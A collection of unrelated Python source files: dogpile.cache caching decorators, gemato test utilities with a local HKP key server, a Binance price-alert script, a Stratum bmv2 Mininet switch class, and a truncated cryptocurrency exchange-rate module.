should follow::
generate_something.set(3, 5, 6)
The above example is equivalent to calling
``generate_something(5, 6)``, if the function were to produce
the value ``3`` as the value to be cached.
.. versionadded:: 0.4.1 Added ``set()`` method to decorated function.
Similar to ``set()`` is ``refresh()``. This attribute will
invoke the decorated function and populate a new value into
the cache with the new value, as well as returning that value::
newvalue = generate_something.refresh(5, 6)
.. versionadded:: 0.5.0 Added ``refresh()`` method to decorated
function.
        ``original()``, on the other hand, will invoke the decorated function
without any caching::
newvalue = generate_something.original(5, 6)
.. versionadded:: 0.6.0 Added ``original()`` method to decorated
function.
Lastly, the ``get()`` method returns either the value cached
for the given key, or the token ``NO_VALUE`` if no such key
exists::
value = generate_something.get(5, 6)
.. versionadded:: 0.5.3 Added ``get()`` method to decorated
function.
The default key generation will use the name
of the function, the module name for the function,
the arguments passed, as well as an optional "namespace"
parameter in order to generate a cache key.
Given a function ``one`` inside the module
``myapp.tools``::
@region.cache_on_arguments(namespace="foo")
def one(a, b):
return a + b
Above, calling ``one(3, 4)`` will produce a
cache key as follows::
myapp.tools:one|foo|3 4
The key generator will ignore an initial argument
of ``self`` or ``cls``, making the decorator suitable
(with caveats) for use with instance or class methods.
Given the example::
class MyClass(object):
@region.cache_on_arguments(namespace="foo")
def one(self, a, b):
return a + b
The cache key above for ``MyClass().one(3, 4)`` will
again produce the same cache key of ``myapp.tools:one|foo|3 4`` -
the name ``self`` is skipped.
The ``namespace`` parameter is optional, and is used
normally to disambiguate two functions of the same
name within the same module, as can occur when decorating
instance or class methods as below::
class MyClass(object):
@region.cache_on_arguments(namespace='MC')
def somemethod(self, x, y):
""
class MyOtherClass(object):
@region.cache_on_arguments(namespace='MOC')
def somemethod(self, x, y):
""
Above, the ``namespace`` parameter disambiguates
between ``somemethod`` on ``MyClass`` and ``MyOtherClass``.
Python class declaration mechanics otherwise prevent
the decorator from having awareness of the ``MyClass``
and ``MyOtherClass`` names, as the function is received
by the decorator before it becomes an instance method.
The function key generation can be entirely replaced
on a per-region basis using the ``function_key_generator``
argument present on :func:`.make_region` and
        :class:`.CacheRegion`. It defaults to
:func:`.function_key_generator`.
:param namespace: optional string argument which will be
established as part of the cache key. This may be needed
to disambiguate functions of the same name within the same
source file, such as those
associated with classes - note that the decorator itself
can't see the parent class on a function as the class is
being declared.
:param expiration_time: if not None, will override the normal
expiration time.
May be specified as a callable, taking no arguments, that
returns a value to be used as the ``expiration_time``. This callable
will be called whenever the decorated function itself is called, in
caching or retrieving. Thus, this can be used to
determine a *dynamic* expiration time for the cached function
result. Example use cases include "cache the result until the
end of the day, week or time period" and "cache until a certain date
or time passes".
.. versionchanged:: 0.5.0
``expiration_time`` may be passed as a callable to
:meth:`.CacheRegion.cache_on_arguments`.
:param should_cache_fn: passed to :meth:`.CacheRegion.get_or_create`.
.. versionadded:: 0.4.3
:param to_str: callable, will be called on each function argument
in order to convert to a string. Defaults to ``str()``. If the
function accepts non-ascii unicode arguments on Python 2.x, the
``unicode()`` builtin can be substituted, but note this will
produce unicode cache keys which may require key mangling before
reaching the cache.
.. versionadded:: 0.5.0
:param function_key_generator: a function that will produce a
"cache key". This function will supersede the one configured on the
:class:`.CacheRegion` itself.
.. versionadded:: 0.5.5
.. seealso::
:meth:`.CacheRegion.cache_multi_on_arguments`
:meth:`.CacheRegion.get_or_create`
"""
expiration_time_is_callable = compat.callable(expiration_time)
if function_key_generator is None:
function_key_generator = self.function_key_generator
def decorator(fn):
if to_str is compat.string_type:
# backwards compatible
key_generator = function_key_generator(namespace, fn)
else:
key_generator = function_key_generator(
namespace, fn,
to_str=to_str)
@wraps(fn)
def decorate(*arg, **kw):
key = key_generator(*arg, **kw)
@wraps(fn)
def creator():
return fn(*arg, **kw)
timeout = expiration_time() if expiration_time_is_callable \
else expiration_time
return self.get_or_create(key, creator, timeout,
should_cache_fn)
def invalidate(*arg, **kw):
key = key_generator(*arg, **kw)
self.delete(key)
def set_(value, *arg, **kw):
key = key_generator(*arg, **kw)
self.set(key, value)
def get(*arg, **kw):
key = key_generator(*arg, **kw)
return self.get(key)
def refresh(*arg, **kw):
key = key_generator(*arg, **kw)
value = fn(*arg, **kw)
self.set(key, value)
return value
decorate.set = set_
decorate.invalidate = invalidate
decorate.refresh = refresh
decorate.get = get
decorate.original = fn
return decorate
return decorator
def cache_multi_on_arguments(
self, namespace=None, expiration_time=None,
should_cache_fn=None,
asdict=False, to_str=compat.string_type,
function_multi_key_generator=None):
"""A function decorator that will cache multiple return
values from the function using a sequence of keys derived from the
function itself and the arguments passed to it.
This method is the "multiple key" analogue to the
:meth:`.CacheRegion.cache_on_arguments` method.
Example::
@someregion.cache_multi_on_arguments()
def generate_something(*keys):
return [
somedatabase.query(key)
for key in keys
]
The decorated function can be called normally. The decorator
will produce a list of cache keys using a mechanism similar to
that of :meth:`.CacheRegion.cache_on_arguments`, combining the
name of the function with the optional namespace and with the
string form of each key. It will then consult the cache using
the same mechanism as that of :meth:`.CacheRegion.get_multi`
to retrieve all current values; the originally passed keys
corresponding to those values which aren't generated or need
regeneration will be assembled into a new argument list, and
the decorated function is then called with that subset of
arguments.
The returned result is a list::
result = generate_something("key1", "key2", "key3")
The decorator internally makes use of the
:meth:`.CacheRegion.get_or_create_multi` method to access the
cache and conditionally call the function. See that
method for additional behavioral details.
Unlike the :meth:`.CacheRegion.cache_on_arguments` method,
:meth:`.CacheRegion.cache_multi_on_arguments` works only with
a single function signature, one which takes a simple list of
keys as arguments.
Like :meth:`.CacheRegion.cache_on_arguments`, the decorated function
is also provided with a ``set()`` method, which here accepts a
mapping of keys and values to set in the cache::
generate_something.set({"k1": "value1",
"k2": "value2", "k3": "value3"})
...an ``invalidate()`` method, which has the effect of deleting
the given sequence of keys using the same mechanism as that of
:meth:`.CacheRegion.delete_multi`::
generate_something.invalidate("k1", "k2", "k3")
...a ``refresh()`` method, which will call the creation
function, cache the new values, and return them::
values = generate_something.refresh("k1", "k2", "k3")
...and a ``get()`` method, which will return values
based on the given arguments::
values = generate_something.get("k1", "k2", "k3")
.. versionadded:: 0.5.3 Added ``get()`` method to decorated
function.
Parameters passed to :meth:`.CacheRegion.cache_multi_on_arguments`
have the same meaning as those passed to
:meth:`.CacheRegion.cache_on_arguments`.
:param namespace: optional string argument which will be
established as part of each cache key.
:param expiration_time: if not None, will override the normal
expiration time. May be passed as an integer or a
callable.
:param should_cache_fn: passed to
:meth:`.CacheRegion.get_or_create_multi`. This function is given a
value as returned by the creator, and only if it returns True will
that value be placed in the cache.
:param asdict: if ``True``, the decorated function should return
its result as a dictionary of keys->values, and the final result
of calling the decorated function will also be a dictionary.
If left at its default value of ``False``, the decorated function
should return its result as a list of values, and the final
result of calling the decorated function will also be a list.
        When ``asdict==True``, any keys missing from the dictionary
        returned by the decorated function will not be cached.
:param to_str: callable, will be called on each function argument
in order to convert to a string. Defaults to ``str()``. If the
function accepts non-ascii unicode arguments on Python 2.x, the
``unicode()`` builtin can be substituted, but note this will
produce unicode cache keys which may require key mangling before
reaching the cache.
.. versionadded:: 0.5.0
:param function_multi_key_generator: a function that will produce a
list of keys. This function will supersede the one configured on the
:class:`.CacheRegion` itself.
.. versionadded:: 0.5.5
.. seealso::
:meth:`.CacheRegion.cache_on_arguments`
:meth:`.CacheRegion.get_or_create_multi`
"""
expiration_time_is_callable = compat.callable(expiration_time)
if function_multi_key_generator is None:
function_multi_key_generator = self.function_multi_key_generator
def decorator(fn):
key_generator = function_multi_key_generator(
namespace, fn,
to_str=to_str)
@wraps(fn)
def decorate(*arg, **kw):
cache_keys = arg
keys = key_generator(*arg, **kw)
key_lookup = dict(zip(keys, cache_keys))
@wraps(fn)
def creator(*keys_to_create):
return fn(*[key_lookup[k] for k in keys_to_create])
timeout = expiration_time() if expiration_time_is_callable \
else expiration_time
if asdict:
def dict_create(*keys):
d_values = creator(*keys)
return [
d_values.get(key_lookup[k], NO_VALUE)
for k in keys]
def wrap_cache_fn(value):
if value is NO_VALUE:
return False
elif not should_cache_fn:
return True
else:
return should_cache_fn(value)
result = self.get_or_create_multi(
keys, dict_create, timeout, wrap_cache_fn)
result = dict(
(k, v) for k, v in zip(cache_keys, result)
if v is not NO_VALUE)
else:
result = self.get_or_create_multi(
keys, creator, timeout,
should_cache_fn)
return result
def invalidate(*arg):
keys = key_generator(*arg)
self.delete_multi(keys)
def set_(mapping):
keys = list(mapping)
gen_keys = key_generator(*keys)
self.set_multi(dict(
(gen_key, mapping[key])
for gen_key, key
in zip(gen_keys, keys))
)
def get(*arg):
keys = key_generator(*arg)
return self.get_multi(keys)
def refresh(*arg):
keys = key_generator(*arg)
values = fn(*arg)
if asdict:
self.set_multi(
dict(zip(keys, [values[a] for a in arg]))
)
return values
else:
self.set_multi(
dict(zip(keys, values))
)
return values
decorate.set = set_
decorate.invalidate = invalidate
decorate.refresh = refresh
decorate.get = get
return decorate
return decorator
def make_region(*arg, **kw):
"""Instantiate a new :class:`.CacheRegion`.
Currently, :func:`.make_region` is a passthrough
to :class:`.CacheRegion`. See that class for
constructor arguments.
"""
return CacheRegion(*arg, **kw)
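# Hedged usage sketch (not part of the original module): wiring make_region()
# together with cache_on_arguments(). It assumes the stock
# "dogpile.cache.memory" backend is available, as in a standard dogpile.cache
# install; the function, namespace and key below are illustrative only.
def _example_region_usage():
    region = make_region().configure(
        "dogpile.cache.memory",
        expiration_time=60,
    )
    @region.cache_on_arguments(namespace="demo")
    def load_user(user_id):
        # stand-in for an expensive lookup
        return {"id": user_id}
    value = load_user(5)        # computed via load_user() and cached
    value = load_user(5)        # served from the cache
    load_user.invalidate(5)     # drops the cached entry
    return value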
|
testutil.py
|
# gemato: Test utility functions
# vim:fileencoding=utf-8
# (c) 2017-2020 Michał Górny
# Licensed under the terms of 2-clause BSD license
import errno
import functools
import io
import logging
import os
import os.path
import random
import shutil
import sys
import tempfile
import threading
import unittest
if sys.hexversion >= 0x03000000:
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse, parse_qs
else:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from urlparse import urlparse, parse_qs
import gemato.openpgp
class LoggingTestCase(unittest.TestCase):
def setUp(self):
if sys.hexversion < 0x03000000:
self.log = io.BytesIO()
else:
self.log = io.StringIO()
        self.log_handler = logging.StreamHandler(self.log)
        logging.getLogger().addHandler(self.log_handler)
def tearDown(self):
# TODO: make some use of the log output?
logging.getLogger().removeHandler(self.log_handler)
class TempDirTestCase(LoggingTestCase):
DIRS = []
FILES = {}
def setUp(self):
super(TempDirTestCase, self).setUp()
self.dir = tempfile.mkdtemp()
for k in self.DIRS:
os.mkdir(os.path.join(self.dir, k))
for k, v in self.FILES.items():
with io.open(os.path.join(self.dir, k), 'w', encoding='utf8') as f:
f.write(v)
def tearDown(self):
shutil.rmtree(self.dir)
super(TempDirTestCase, self).tearDown()
class HKPServerRequestHandler(BaseHTTPRequestHandler):
def __init__(self, keys, *args, **kwargs):
self.keys = keys
BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def log_message(self, *args, **kwargs):
pass
def do_GET(self):
try:
parsed = urlparse(self.path)
assert parsed.path == '/pks/lookup'
qs = parse_qs(parsed.query)
assert qs.get('op') == ['get']
assert len(qs.get('search', [])) == 1
key = qs['search'][0]
assert key.startswith('0x')
key = key[2:]
except AssertionError:
self.send_error(400, "Bad request")
return
if key not in self.keys:
self.send_error(404, "Not found")
return
self.send_response(200, "OK")
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(self.keys[key])
self.wfile.flush()
class HKPServerTestCase(unittest.TestCase):
"""
A test case deploying HKP server for OpenPGP client to use.
"""
SERVER_KEYS = {}
def setUp(self):
# try 10 randomly selected ports before giving up
for port in random.sample(range(1024, 32768), 10):
try:
self.server = HTTPServer(('127.0.0.1', port),
functools.partial(HKPServerRequestHandler,
self.SERVER_KEYS))
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise unittest.SkipTest('Unable to bind the HKP server: {}'
.format(e))
else:
break
else:
raise unittest.SkipTest('Unable to find a free port for HKP server')
self.server_addr = 'hkp://127.0.0.1:{}'.format(port)
self.server_thread = threading.Thread(
target=self.server.serve_forever)
self.server_thread.start()
def tearDown(self):
self.server.shutdown()
self.server.server_close()
self.server_thread.join()
class MockedWKDOpenPGPEnvironment(gemato.openpgp.OpenPGPEnvironment):
"""
A subclass of OpenPGPEnvironment that partially mocks spawning
OpenPGP in order to inject keys without having to implement
full HTTPS server with domain satisfactory to GnuPG.
"""
def __init__(self, keys={}):
self.keys = keys
super(MockedWKDOpenPGPEnvironment, self).__init__()
def clone(self):
return MockedWKDOpenPGPEnvironment(self.keys)
def _spawn_gpg(self, argv, stdin=''):
if '--locate-keys' in argv:
argv.remove('--locate-keys')
assert len(argv) == 3
assert argv[:2] == ['gpg', '--batch']
if argv[2] in self.keys:
ret, sout, serr = super(MockedWKDOpenPGPEnvironment,
self)._spawn_gpg(
['gpg', '--batch', '--import'],
self.keys[argv[2]])
else:
ret = 2
return (ret, b'', b'')
return super(MockedWKDOpenPGPEnvironment, self)._spawn_gpg(
argv, stdin)
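# Hedged usage sketch (not part of the original module): a test case built on
# TempDirTestCase -- files declared in FILES are created under self.dir in
# setUp(). The file name and assertion are illustrative only.
def _example_tempdir_test():
    class ExampleManifestTest(TempDirTestCase):
        FILES = {
            'Manifest': u'',
        }
        def test_manifest_created(self):
            self.assertTrue(
                os.path.exists(os.path.join(self.dir, 'Manifest')))
    return ExampleManifestTest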
|
main.py
|
from binance.client import Client
from dotenv import load_dotenv
from bin.Token import *
from bin.live_updates import *
from progress.bar import Bar
import os, yaml, json, asyncio, websockets, threading
token_instances = {}
alerts = []
# Load env variables
load_dotenv()
client = Client(os.getenv('API_KEY'), os.getenv('API_SECRET'))
# Initialize server
async def server(websocket, path):
    while True:
        if alerts:
            await websocket.send(json.dumps(alerts.pop()))
        else:
            # yield to the event loop so this coroutine doesn't busy-wait
            await asyncio.sleep(0.1)
# Start websocket server
def start_server():
asyncio.set_event_loop(asyncio.new_event_loop())
start_server = websockets.serve(server, "localhost", 5000)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
# Load yaml config
with open('config.yml', 'r') as ymlfile:
try:
config = yaml.safe_load(ymlfile)
except yaml.YAMLError as err:
print(err)
# Start local websocket server
websocket_server = threading.Thread(target=start_server)
websocket_server.start()
# Start websocket connections ( get live token data )
live_updates_thread = threading.Thread(target=live_updates, args=(config['time_intervals'], config['ema_intervals'], config['watchlist'], 'binance.com', token_instances, alerts))
live_updates_thread.start()
# Download historical token data
for token in config['watchlist']:
print(f"Downloading data for {token}...")
progress_bar = Bar('',
max=(len(config['time_intervals']) * len(config['ema_intervals']) + len(config['time_intervals'])),
fill='█',
suffix='%(percent).1f%% - %(eta)ds')
token_analysis = Token(client, token, config['time_intervals'], config['ema_intervals'], config['precision'], progress_bar)
token_analysis.download_history()
token_analysis.calc_emas()
token_instances.update({token: token_analysis})
print("Done!")
|
stratum.py
|
# coding=utf-8
# Copyright 2018-present Open Networking Foundation
# SPDX-License-Identifier: Apache-2.0
'''
This module contains a switch class for Mininet: StratumBmv2Switch
Prerequisites
-------------
1. Docker- mininet+stratum_bmv2 image:
$ cd stratum
$ docker build -t <some tag> -f tools/mininet/Dockerfile .
Usage
-----
From within the Docker container, you can run Mininet using the following:
$ mn --custom /root/stratum.py --switch stratum-bmv2 --controller none
Advanced Usage
--------------
You can use this class in a Mininet topology script by including:
from stratum import StratumBmv2Switch
You will probably need to update your Python path. From within the Docker image:
PYTHONPATH=$PYTHONPATH:/root ./<your script>.py
Notes
-----
This code has been adapted from the ONOSBmv2Switch class defined in the ONOS project
(tools/dev/mininet/bmv2.py).
'''
import json
import multiprocessing
import os
import socket
import threading
import time
from mininet.log import warn
from mininet.node import Switch, Host
DEFAULT_NODE_ID = 1
DEFAULT_CPU_PORT = 255
DEFAULT_PIPECONF = "org.onosproject.pipelines.basic"
STRATUM_BMV2 = 'stratum_bmv2'
STRATUM_INIT_PIPELINE = '/root/dummy.json'
MAX_CONTROLLERS_PER_NODE = 10
BMV2_LOG_LINES = 5
def writeToFile(path, value):
with open(path, "w") as f:
f.write(str(value))
def pickUnusedPort():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 0))
addr, port = s.getsockname()
s.close()
return port
def watchdog(sw):
try:
writeToFile(sw.keepaliveFile,
"Remove this file to terminate %s" % sw.name)
while True:
if StratumBmv2Switch.mininet_exception == 1 \
or not os.path.isfile(sw.keepaliveFile):
sw.stop()
return
if sw.stopped:
return
if sw.bmv2popen.poll() is None:
# All good, no return code, still running.
time.sleep(1)
else:
warn("\n*** WARN: switch %s died ☠️ \n" % sw.name)
sw.printLog()
print("-" * 80) + "\n"
# Close log file, set as stopped etc.
sw.stop()
return
except Exception as e:
warn("*** ERROR: " + e.message)
sw.stop()
class StratumBmv2Switch(Switch):
# Shared value used to notify to all instances of this class that a Mininet
# exception occurred. Mininet exception handling doesn't call the stop()
# method, so the mn process would hang after clean-up since Bmv2 would still
# be running.
mininet_exception = multiprocessing.Value('i', 0)
nextGrpcPort = 50001
def __init__(self, name, json=STRATUM_INIT_PIPELINE, loglevel="warn",
cpuport=DEFAULT_CPU_PORT, pipeconf=DEFAULT_PIPECONF,
onosdevid=None,
**kwargs):
Switch.__init__(self, name, **kwargs)
self.grpcPort = StratumBmv2Switch.nextGrpcPort
StratumBmv2Switch.nextGrpcPort += 1
self.cpuPort = cpuport
self.json = json
self.loglevel = loglevel
self.tmpDir = '/tmp/%s' % self.name
self.logfile = '%s/stratum_bmv2.log' % self.tmpDir
self.netcfgFile = '%s/onos-netcfg.json' % self.tmpDir
self.chassisConfigFile = '%s/chassis-config.txt' % self.tmpDir
self.pipeconfId = pipeconf
self.longitude = kwargs['longitude'] if 'longitude' in kwargs else None
self.latitude = kwargs['latitude'] if 'latitude' in kwargs else None
if onosdevid is not None and len(onosdevid) > 0:
self.onosDeviceId = onosdevid
else:
# The "device:" prefix is required by ONOS.
self.onosDeviceId = "device:%s" % self.name
self.nodeId = DEFAULT_NODE_ID
self.logfd = None
self.bmv2popen = None
self.stopped = True
# In case of exceptions, mininet removes *.out files from /tmp. We use
# this as a signal to terminate the switch instance (if active).
self.keepaliveFile = '/tmp/%s-watchdog.out' % self.name
# Remove files from previous executions
self.cleanupTmpFiles()
os.mkdir(self.tmpDir)
def getOnosNetcfg(self):
basicCfg = {
"managementAddress": "grpc://localhost:%d?device_id=%d" % (
self.grpcPort, self.nodeId),
"driver": "stratum-bmv2",
"pipeconf": self.pipeconfId
}
if self.longitude and self.latitude:
basicCfg["longitude"] = self.longitude
basicCfg["latitude"] = self.latitude
netcfg = {
"devices": {
self.onosDeviceId: {
"basic": basicCfg
}
}
}
return netcfg
def getChassisConfig(self):
config = """description: "stratum_bmv2 {name}"
chassis {{
platform: PLT_P4_SOFT_SWITCH
name: "{name}"
}}
nodes {{
id: {nodeId}
name: "{name} node {nodeId}"
slot: 1
index: 1
}}\n""".format(name=self.name, nodeId=self.nodeId)
intf_number = 1
for intf_name in self.intfNames():
if intf_name == 'lo':
continue
config = config + """singleton_ports {{
id: {intfNumber}
name: "{intfName}"
slot: 1
port: {intfNumber}
channel: 1
speed_bps: 10000000000
config_params {{
admin_state: ADMIN_STATE_ENABLED
}}
node: {nodeId}
}}\n""".format(intfName=intf_name, intfNumber=intf_number, nodeId=self.nodeId)
intf_number += 1
return config
def start(self, controllers):
if not self.stopped:
warn("*** %s is already running!\n" % self.name)
return
writeToFile("%s/grpc-port.txt" % self.tmpDir, self.grpcPort)
with open(self.chassisConfigFile, 'w') as fp:
fp.write(self.getChassisConfig())
with open(self.netcfgFile, 'w') as fp:
json.dump(self.getOnosNetcfg(), fp, indent=2)
args = [
STRATUM_BMV2,
'-device_id=%d' % self.nodeId,
'-chassis_config_file=%s' % self.chassisConfigFile,
'-forwarding_pipeline_configs_file=%s/pipe.txt' % self.tmpDir,
'-persistent_config_dir=%s' % self.tmpDir,
'-initial_pipeline=%s' % STRATUM_INIT_PIPELINE,
'-cpu_port=%s' % self.cpuPort,
'-external_stratum_urls=0.0.0.0:%d' % self.grpcPort,
'-local_stratum_url=localhost:%d' % pickUnusedPort(),
'-max_num_controllers_per_node=%d' % MAX_CONTROLLERS_PER_NODE,
'-write_req_log_file=%s/write-reqs.txt' % self.tmpDir,
'-logtosyslog=false',
'-logtostderr=true',
'-bmv2_log_level=%s' % self.loglevel,
]
cmd_string = " ".join(args)
try:
# Write cmd_string to log for debugging.
self.logfd = open(self.logfile, "w")
self.logfd.write(cmd_string + "\n\n" + "-" * 80 + "\n\n")
self.logfd.flush()
self.bmv2popen = self.popen(cmd_string, stdout=self.logfd, stderr=self.logfd)
print "⚡️ %s @ %d" % (STRATUM_BMV2, self.grpcPort)
# We want to be notified if stratum_bmv2 quits prematurely...
self.stopped = False
threading.Thread(target=watchdog, args=[self]).start()
except Exception:
StratumBmv2Switch.mininet_exception = 1
self.stop()
self.printLog()
raise
def printLog(self):
if os.path.isfile(self.logfile):
print "-" * 80
print "%s log (from %s):" % (self.name, self.logfile)
with open(self.logfile, 'r') as f:
lines = f.readlines()
if len(lines) > BMV2_LOG_LINES:
print "..."
for line in lines[-BMV2_LOG_LINES:]:
print line.rstrip()
def cleanupTmpFiles(self):
self.cmd("rm -rf %s" % self.tmpDir)
def stop(self, deleteIntfs=True):
"""Terminate switch."""
self.stopped = True
if self.bmv2popen is not None:
if self.bmv2popen.poll() is None:
self.bmv2popen.terminate()
self.bmv2popen.wait()
self.bmv2popen = None
if self.logfd is not None:
self.logfd.close()
self.logfd = None
Switch.stop(self, deleteIntfs)
class NoOffloadHost(Host):
def __init__(self, name, inNamespace=True, **params):
Host.__init__(self, name, inNamespace=inNamespace, **params)
def config(self, **params):
r = super(Host, self).config(**params)
for off in ["rx", "tx", "sg"]:
cmd = "/sbin/ethtool --offload %s %s off" \
% (self.defaultIntf(), off)
self.cmd(cmd)
return r
# Exports for bin/mn
switches = {'stratum-bmv2': StratumBmv2Switch}
hosts = {'no-offload-host': NoOffloadHost}
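# Hedged usage sketch (not part of the original module): a minimal topology
# built directly on StratumBmv2Switch, assuming Mininet is available as in the
# Docker image described in the module docstring. Without a controller and
# pipeline, pingAll() is expected to fail; it is only here to exercise the net.
def _example_single_switch_net():
    from mininet.net import Mininet
    from mininet.topo import SingleSwitchTopo
    net = Mininet(topo=SingleSwitchTopo(2),
                  switch=StratumBmv2Switch,
                  host=NoOffloadHost,
                  controller=None)
    net.start()
    net.pingAll()
    net.stop()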
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .zcore import COIN
from .i18n import _
from .util import PrintError, ThreadJob, make_dir
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'}, timeout=10)
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = os.path.join(cache_dir, self.name() + '_'+ ccy)
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r', encoding='utf-8') as f:
h = json.loads(f.read())
h['timestamp'] = timestamp
except:
h = None
else:
h = None
if h:
self.history[ccy] = h
self.on_history()
return h
def get_historical_rates_safe(self, ccy, cache_dir):
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
except BaseException as e:
self.print_error("failed fx history:", e)
return
filename = os.path.join(cache_dir, self.name() + '_' + ccy)
with open(filename, 'w', encoding='utf-8') as f:
f.write(json.dumps(h))
h['timestamp'] = time.time()
self.history[ccy] = h
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
if ccy not in self.history_ccys():
return
h = self.history.get(ccy)
if h is None:
h = self.read_historical_rates(ccy, cache_dir)
if h is None or h['timestamp'] < time.time() - 24*3600:
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir))
t.setDaemon(True)
t.start()
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'), 'NaN')
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short')
return dict([(r.replace("BTC", ""), Decimal(json[r]['last']))
for r in json if r != 'timestamp'])
def history_ccys(self):
return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
'ZAR']
def request_history(self, ccy):
history = self.get_csv('apiv2.bitcoinaverage.com',
"/indices/global/history/BTC%s?period=alltime&format=csv" % ccy)
return dict([(h['DateTime'][:10], h['Average'])
for h in history])
class Bitcointoyou(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitcointoyou.com', "/API/ticker.aspx")
return {'BRL': Decimal(json['ticker']['last'])}
def history_ccys(self):
return ['BRL']
class BitcoinVenezuela(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitcoinvenezuela.com', '/')
rates = [(r, json['BTC'][r]) for r in json['BTC']
if json['BTC'][r] is not None] # Giving NULL for LTC
return dict(rates)
def history_ccys(self):
return ['ARS', 'EUR', 'USD', 'VEF']
def request_history(self, ccy):
return self.get_json('api.bitcoinvenezuela.com',
"/historical/index.php?coin=BTC")[ccy +'_BTC']
class Bitbank(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('public.bitbank.cc', '/btc_jpy/ticker')
return {'JPY': Decimal(json['data']['last'])}
class BitFlyer(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitflyer.jp', '/api/echo/price')
return {'JPY': Decimal(json['mid'])}
class Bitmarket(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitmarket.pl', '/json/BTCPLN/ticker.json')
return {'PLN': Decimal(json['last'])}
class BitPay(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitpay.com', '/api/rates')
return dict([(r['code'], Decimal(r['rate'])) for r in json])
class Bitso(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitso.com', '/v2/ticker')
return {'MXN': Decimal(json['last'])}
class BitStamp(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitstamp.net', '/api/ticker/')
return {'USD': Decimal(json['last'])}
class Bitvalor(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['total']['last'])}
class BlockchainInfo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('blockchain.info', '/ticker')
return dict([(r, Decimal(json[r]['15m'])) for r in json])
class BTCChina(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('data.btcchina.com', '/data/ticker')
return {'CNY': Decimal(json['ticker']['last'])}
class BTCParalelo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('btcparalelo.com', '/api/price')
return {'VEF': Decimal(json['price'])}
class Coinbase(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('coinbase.com',
'/api/v1/currencies/exchange_rates')
return dict([(r[7:].upper(), Decimal(json[r]))
for r in json if r.startswith('btc_to_')])
class CoinDesk(ExchangeBase):
def get_currencies(self):
dicts = self.get_json('api.coindesk.com',
'/v1/bpi/supported-currencies.json')
return [d['currency'] for d in dicts]
def get_rates(self, ccy):
json = self.get_json('api.coindesk.com',
'/v1/bpi/currentprice/%s.json' % ccy)
result = {ccy: Decimal(json['bpi'][ccy]['rate_float'])}
return result
def history_starts(self):
return { 'USD': '2012-11-30', 'EUR': '2013-09-01' }
def history_ccys(self):
return self.history_starts().keys()
def request_history(self, ccy):
start = self.history_starts()[ccy]
end = datetime.today().strftime('%Y-%m-%d')
# Note ?currency and ?index don't work as documented. Sigh.
query = ('/v1/bpi/historical/close.json?start=%s&end=%s'
% (start, end))
json = self.get_json('api.coindesk.com', query)
return json['bpi']
class Coinsecure(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinsecure.in', '/v0/noauth/newticker')
return {'INR': Decimal(json['lastprice'] / 100.0 )}
class Foxbit(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
